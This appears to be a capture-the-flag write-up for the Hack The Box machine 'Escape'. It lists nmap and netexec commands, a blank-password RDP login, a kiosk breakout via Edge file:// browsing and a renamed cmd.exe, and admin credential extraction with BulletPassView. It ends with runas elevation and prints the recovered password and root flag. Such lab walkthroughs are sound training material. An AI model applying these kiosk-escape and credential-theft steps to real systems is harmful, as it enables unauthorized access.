Platform: Hack The Box
Difficulty: Easy
IP Address: 10.129.234.51
Date Completed: 2025-07-27
VulnEscape is an Easy-rated Windows machine where RDP is the sole exposed service. A user named KioskUser0 can log in via RDP with no password, but the environment is restricted by kiosk-style policies. Exploiting Microsoft Edge’s file:// scheme allows file system access, and a trick involving renaming cmd.exe to msedge.exe leads to command execution. Further privilege escalation is achieved by extracting admin credentials from a Remote Desktop Plus profile using BulletPassView. These creds are used with runas to gain a full administrator PowerShell session, bypassing UAC and retrieving the root flag.
nmap -p- --min-rate 10000 10.129.234.51
nmap -p 3389 -sCV -oN nmapscan 10.129.234.51
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: ESCAPE
| NetBIOS_Domain_Name: ESCAPE
| NetBIOS_Computer_Name: ESCAPE
| Product_Version: 10.0.19041
netexec rdp 10.129.234.51 -u KioskUser0 -p ''
xfreerdp3 /v:10.129.234.51 "/u:Escape\KioskUser0" /p:""
This gives access to a restricted desktop environment.
file://C:\ to browse the file systemcmd.exe, rename it to msedge.exe, and run ituser.txt from the desktopC:\admin\, discover profile.xml used by Remote Desktop PlusTwisting3021
runas /user:admin powershell
start-process powershell -verb runas
root.txt
5c38d518996a362275e756ddbab14513
file:// schemes can leak valuable filesystem viewscmd.exe rename bypasses shell restrictions